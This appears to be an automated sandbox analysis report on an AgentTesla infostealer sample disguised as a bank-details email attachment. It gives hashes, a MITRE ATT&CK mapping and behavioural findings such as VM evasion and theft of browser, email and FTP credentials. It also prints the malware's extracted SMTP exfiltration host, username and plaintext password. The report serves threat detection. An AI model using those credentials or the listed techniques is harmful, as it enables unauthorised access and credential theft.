Overview

overview

10

Static

static

Fwd WRONG ...'S.exe

windows7_x64

10

Fwd WRONG ...'S.exe

windows10-2004_x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    2909e9a7f4e544cb4089a7f05e3af83c1d6faeb5d3c0d82c0938cd369cba8d8f

  • Size

    390KB

  • Sample

    220521-bw8weaffel

  • MD5

    8448a2b6396013f5d31af44da4a324f8

  • SHA1

    b15f2cd0590d755c5f8cc11b0142ca11908d4afa

  • SHA256

    2909e9a7f4e544cb4089a7f05e3af83c1d6faeb5d3c0d82c0938cd369cba8d8f

  • SHA512

    1db98a0806d9769de88a8662b794d79da5daadbe0d8b28e9dfd53a58acd567a45102f76022887560552165e0553345b8f2afa1c416adcf6e09e276c211032d72

Score
10/10
agentteslacollectionevasionkeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:     smtp
  • Host:
    mail.opporajasthan.in
  • Port:
    587
  • Username:
    [email protected]
  • Password:
    Systems@1234

Targets

    • Target

      Fwd WRONG BANK DETAIL'S.exe

    • Size

      430KB

    • MD5

      dd5e8f55df6577549de4bc6f120fbdc1

    • SHA1

      13010fa3bd4c7e1f7852d579c10505a40afa4bab

    • SHA256

      f791e41279744779b60a12e8e88ab15dd254c89acfb75ed5a3772053f8831f63

    • SHA512

      1458eff2920a357a6545425931688b2b4e37b034134d37bd697cafa06629e1ed34f4d41516943306b0241c4e90a9549644ba5af50b6f257a7c393705b612f676

    Score
    10/10
    agentteslaevasionkeyloggerspywarestealertrojancollection

    • AgentTesla

      Agent Tesla is a remote access tool (RAT) written in visual basic.

      keyloggertrojanstealerspywareagenttesla

    • AgentTesla Payload

    • Looks for VirtualBox Guest Additions in registry

      evasion

    • Looks for VMWare Tools registry key

      evasion

    • Checks BIOS information in registry

      BIOS information is often read in order to detect sandboxing environments.

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Reads data files stored by FTP clients

      Tries to access configuration files associated with programs like FileZilla.

      spywarestealer

    • Reads user/profile data of local email clients

      Email clients store some user data on disk where infostealers will often target it.

      spywarestealer

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

      spywarestealer

    • Accesses Microsoft Outlook profiles

      collection

    • Maps connected drives based on registry

      Disk information is often read in order to detect sandboxing environments.

    • Suspicious use of SetThreadContext

    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Virtualization/Sandbox Evasion

2
T1497

Credential Access

Credentials in Files

3
T1081

Discovery

Query Registry

5
T1012

Virtualization/Sandbox Evasion

2
T1497

System Information Discovery

4
T1082

Peripheral Device Discovery

1
T1120

Lateral Movement

Collection

Data from Local System

3
T1005

Email Collection

1
T1114

Exfiltration

Command and Control

Impact

Tasks